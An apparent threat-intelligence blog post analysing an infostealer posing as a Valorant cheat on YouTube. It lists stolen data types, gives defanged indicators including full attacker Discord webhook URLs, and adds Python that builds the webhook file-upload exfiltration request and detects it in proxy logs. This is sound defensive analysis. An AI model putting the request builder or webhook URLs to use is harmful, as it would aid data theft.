The ASEC analysis team has recently discovered an infostealer that is being distributed via YouTube. The attacker disguised the malware as a game hack for Valorant, uploaded the video shown below with a download link for the malware, and instructed viewers to turn off their anti-malware program before running it.
A previous ASEC blog post covered another case of malware distributed via YouTube under the guise of a game hack or crack.
When users click the link to download the game hack program for Valorant, the following download page is displayed.
- Download page URL: hxxps://anonfiles[.]com/J0b03cKexf
- File download URL: hxxps://cdn-149.anonfiles[.]com/J0b03cKexf/bfb807d9-1646204724/Pluto%20Valornt%20cheat.rar
The downloaded archive “Pluto Valornt cheat.rar” contains an executable named “Cheat installer.exe”. Although the name suggests a game hack installer, it is actually an infostealer.
When executed, the malware collects basic information about the infected system, takes screenshots, and steals credentials and session data: account credentials saved in web browsers and VPN clients, cryptocurrency wallet files, Discord tokens, and Telegram session files. The full list of targets is as follows:
1. Basic information
– Computer name, user name, IP address, Windows version, system information (CPU, GPU, RAM, etc.), and list of processes
2. Web browser
2.1. List of targeted web browsers
– Chrome, Edge, and Firefox
2.2. Stolen information
– Passwords, credit card numbers, AutoFill forms, bookmarks, and cookies
3. Cryptocurrency wallet file
– Armory, AtomicWallet, BitcoinCore, Bytecoin, DashCore, Electrum, Ethereum, LitecoinCore, Monero, Exodus, Zcash, and Jaxx
4. VPN client account credentials
4.1. List of targeted VPN clients
– ProtonVPN, OpenVPN, and NordVPN
4.2. Stolen information
– Account credentials
– Host address, port number, user name, and passwords
5.2. Minecraft VimeWorld
– Account credentials, level, ranking, etc.
6. Telegram
– Client session information
7. Discord
– Token information
The malware compresses the stolen data listed above into an archive and sends it to the attacker through the Discord webhook API.
A webhook lets anyone who holds its URL post messages and attachments into a specific Discord channel, with no Discord account or bot token required. The malware therefore sends an HTTP POST request to the webhook URL with the archive attached, and the attacker receives the stolen data together with a notification in their own Discord server. The malware uses the following two webhook URLs belonging to the attacker; UserAgent and UserName are the HTTP User-Agent header and the sender name it uses with each one.
- WebHook URL: hxxps://discordapp[.]com/api/webhooks/947181971019292714/gXE5T4ZQQF0yGOhuBSDhTkFXB0ut9ai71IZmOFvsdIaznalhyvQP0h45xCss-8W7KQCo
  – UserAgent: log
  – UserName: log
- WebHook URL: hxxps://discord[.]com/api/webhooks/940299131098890301/RU4T0D4gNAYM0BZkAMMKQRwGBORfHiJUJ5lJ20Gd-s2yCIX9lXCbyB6yZ6zHUA5B-H42
  – UserAgent: logloglog91
  – UserName: logloglog91
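To make the exfiltration channel concrete, the following is an added example (written for this page, not code from the ASEC post or from the malware). It builds the raw HTTP request a Discord webhook file upload consists of, so the on-the-wire shape can be inspected, and it runs a small detector over constructed proxy log lines that flags requests to webhook URLs. The second webhook URL from the report is reused as the indicator; the log format, the `refang` helper, the 17-20 digit id / 50+ character token lengths in the regex, and the message text are assumptions. The `payload_json` part (with its `username` field overriding the sender name) and the `file` part follow the Discord webhook API's multipart upload convention.

```python
# Added example, not code from the ASEC post or from the malware: it shows what a
# Discord-webhook file upload looks like on the wire and flags such uploads in proxy logs.
import json
import re
import shlex
import uuid
from typing import Optional

# Webhook URL shape seen in the report: discord.com or discordapp.com host, numeric
# webhook id, then a long URL-safe token. The token is the only credential needed to post.
# (Id and token lengths are assumptions chosen to fit the URLs in the report.)
DISCORD_WEBHOOK_RE = re.compile(
    r"https?://(?:canary\.|ptb\.)?discord(?:app)?\.com/api/webhooks/"
    r"(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]{50,})"
)

# The second webhook URL from the report, defanged exactly as it appears there.
REPORT_WEBHOOK = ("hxxps://discord[.]com/api/webhooks/940299131098890301/"
                  "RU4T0D4gNAYM0BZkAMMKQRwGBORfHiJUJ5lJ20Gd-s2yCIX9lXCbyB6yZ6zHUA5B-H42")


def refang(ioc: str) -> str:
    """Turn the defanged form used in threat reports (hxxps://, [.]) back into a real URL."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


def build_exfil_request(webhook_url: str, archive_name: str, archive: bytes,
                        username: str, user_agent: str,
                        boundary: Optional[str] = None) -> bytes:
    """Raw HTTP/1.1 request for a webhook file upload: a multipart/form-data POST with a
    payload_json part (message text plus the overridden sender name) and a file part.
    Nothing is sent; the bytes are returned so they can be inspected or turned into a signature."""
    if not DISCORD_WEBHOOK_RE.fullmatch(webhook_url):
        raise ValueError("not a Discord webhook URL")
    host = webhook_url.split("/")[2]
    path = webhook_url[webhook_url.index("/api/"):]
    b = (boundary or uuid.uuid4().hex).encode()
    payload = json.dumps({"username": username, "content": "new log"}).encode()  # assumed text
    body = b"".join([
        b"--" + b + b"\r\n",
        b'Content-Disposition: form-data; name="payload_json"\r\n',
        b"Content-Type: application/json\r\n\r\n", payload, b"\r\n",
        b"--" + b + b"\r\n",
        b'Content-Disposition: form-data; name="file"; filename="'
        + archive_name.encode() + b'"\r\n',
        b"Content-Type: application/octet-stream\r\n\r\n", archive, b"\r\n",
        b"--" + b + b"--\r\n",
    ])
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\n"
            f"Content-Type: multipart/form-data; boundary={b.decode()}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


# Constructed proxy log lines (not from the report), one request per line:
# time  client_ip  method  url  status  request_content_type  "user_agent"
SAMPLE_PROXY_LOG = """\
2022-03-02T10:15:01Z 10.0.0.12 GET https://www.google.com/search?q=valorant 200 text/html "Mozilla/5.0"
2022-03-02T10:16:40Z 10.0.0.12 POST https://discord.com/api/webhooks/940299131098890301/RU4T0D4gNAYM0BZkAMMKQRwGBORfHiJUJ5lJ20Gd-s2yCIX9lXCbyB6yZ6zHUA5B-H42 200 multipart/form-data "logloglog91"
2022-03-02T10:16:41Z 10.0.0.12 POST https://discordapp.com/api/webhooks/947181971019292714/gXE5T4ZQQF0yGOhuBSDhTkFXB0ut9ai71IZmOFvsdIaznalhyvQP0h45xCss-8W7KQCo 204 application/json "log"
"""


def scan_proxy_log(log: str) -> list:
    """Flag every request to a Discord webhook URL. A multipart POST (file upload) from a
    non-browser User-Agent is the exfiltration pattern described in the report; a plain
    JSON POST is a text-only notification to the same channel."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, src, method, url, status, ctype, ua = shlex.split(line)
        m = DISCORD_WEBHOOK_RE.search(url)
        if not m:
            continue
        hits.append({
            "time": ts,
            "src": src,
            "webhook_id": m["id"],
            "token_prefix": m["token"][:6] + "...",  # the token is a secret; keep it out of tickets
            "file_upload": method == "POST" and ctype.startswith("multipart/form-data"),
            "user_agent": ua,
            "browser_ua": ua.startswith("Mozilla/"),
        })
    return hits


if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(h)
    print(build_exfil_request(refang(REPORT_WEBHOOK), "loot.zip", b"PK\x03\x04",
                              "logloglog91", "logloglog91", boundary="b0undary")[:160])
```

The durable signal is the URL path `/api/webhooks/<id>/<token>` on a Discord host, not the User-Agent strings, which the attacker can change at will. Treat a recovered webhook URL as a credential: whoever holds the full URL can post to the channel or delete the webhook, so redact the token when the indicator is shared, and consider blocking or alerting on `discord.com/api/webhooks/` at the egress proxy where Discord is not an approved business tool.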
A case of stealing information using the Discord webhook API was introduced in a previous ASEC blog post.
As this post shows, malware can be delivered through many platforms, so users should refrain from downloading cracks and game hacks, avoid suspicious websites and P2P networks, and always use genuine software. V3 should also be kept up to date so that infections are prevented.
– Malware/Win.AY.C4396023 (2021.03.29.01)
– Download page: hxxps://anonfiles[.]com/J0b03cKexf
– Malicious compressed file download URL: hxxps://cdn-149.anonfiles[.]com/J0b03cKexf/bfb807d9-1646204724/Pluto%20Valornt%20cheat.rar
– Discord WebHook URLs: hxxps://discordapp[.]com/api/webhooks/947181971019292714/gXE5T4ZQQF0yGOhuBSDhTkFXB0ut9ai71IZmOFvsdIaznalhyvQP0h45xCss-8W7KQCo and hxxps://discord[.]com/api/webhooks/940299131098890301/RU4T0D4gNAYM0BZkAMMKQRwGBORfHiJUJ5lJ20Gd-s2yCIX9lXCbyB6yZ6zHUA5B-H42